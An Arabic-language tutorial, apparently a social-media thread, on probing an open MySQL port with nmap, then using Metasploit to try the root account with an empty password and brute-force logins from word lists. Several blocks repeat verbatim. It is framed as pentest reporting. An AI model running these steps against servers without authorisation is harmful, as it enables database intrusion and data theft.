وانت بتعمل scan وشغال ب nmap ولقيت بورت رقمه 3306 مفتوح وقف عندك فى مصيبه هنا
البورت ده هو المختص بال Mysql
الامر
nmap -p3306 <ip>
لو ظهر انه open
هتدخل على المرحله التانيه تشوف الservice وال version اللى شغاله عليه
nmap -sv -p3306 <ip>
البورت ده هو المختص بال Mysql
الامر
nmap -p3306 <ip>
لو ظهر انه open
هتدخل على المرحله التانيه تشوف الservice وال version اللى شغاله عليه
nmap -sv -p3306 <ip>
بعد ما تتاكد ان شغال عليه Mysql والاصدار بتاعها وهتدخل على مرحلة ال exploit
هنعمل اتصال على البورت باستخدام Metasploit
use auxiliary/scanner/mysql/mysql_schemadump
set rhosts <ip>
set username root
set password
هتشتغل على ال default
User root
Password هتسيبها فاضيه
exploit
هنعمل اتصال على البورت باستخدام Metasploit
use auxiliary/scanner/mysql/mysql_schemadump
set rhosts <ip>
set username root
set password
هتشتغل على ال default
User root
Password هتسيبها فاضيه
exploit
لو انت محظوظ هيحصل الاتصال اما لو كان فى يوزر وباسورد هتدخل على مرحلة ال bruteforce علشان التخمين باستخدام user.txt و pass.txt
use auxiliary/scanner/mysql/mysql_login
set rhosts <ip>
set user_file /root/Desktop/user.txt set pass_file /root/Desktop/pass.txt exploit
use auxiliary/scanner/mysql/mysql_login
set rhosts <ip>
set user_file /root/Desktop/user.txt set pass_file /root/Desktop/pass.txt exploit
لو نجح الbruteforce وطلع اليوزر والباس كدا هترجع للخطوه اللى فاتت وتسجل دخول وكدا تم الاتصال
ممكن تكمل بخطوات اخرى لكن بالنسبه لنا ملهاش لازمه هنوقف على كدا ونبلغ الريبورت وطبعا خطورته critical
ممكن تقرا عن الموضوع ده هنا 👇👇
hackingarticles.in
ممكن تكمل بخطوات اخرى لكن بالنسبه لنا ملهاش لازمه هنوقف على كدا ونبلغ الريبورت وطبعا خطورته critical
ممكن تقرا عن الموضوع ده هنا 👇👇
hackingarticles.in
جاري تحميل الاقتراحات...